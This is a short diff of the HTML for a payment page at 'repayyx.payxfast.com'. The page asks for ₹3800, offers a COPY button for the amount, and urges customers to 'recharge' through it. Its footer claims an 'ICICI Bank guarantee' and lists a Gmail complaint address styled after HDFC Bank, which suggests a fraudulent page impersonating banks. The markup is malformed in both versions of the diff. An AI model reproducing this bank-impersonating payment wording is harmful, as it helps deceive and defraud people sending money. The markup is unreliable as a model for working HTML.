--- a/repayyx.payxfast.com/index.html
+++ b/repayyx.payxfast.com/index.html
@@ -12,7 +12,7 @@
         <table width="100%">
             <tr>
                 <td>Amount</td>
-             <br> <td align="right" ₹ 3800</td>
+             <td align="right" ₹ 3800</td>
                 <td><button class="cpb" onclick="copyAmount()">COPY</button></td>
       </head>
        <body>     
@@ -63,7 +63,7 @@
 
          <center>
         <p style="color: lightgray; font-size: 12px;">Dear customers: please give priority to this channel to recharge! Support UPI account withdrawal! ICICI Bank guarantee! Safe and reliable! If you have any questions, please contact: <br>
-             hdfcbankcomplaintacceptance@gmail.com</center>
+ <td style= "color"            hdfcbankcomplaintacceptance@gmail.com</center>
         </p>
     </div>
 
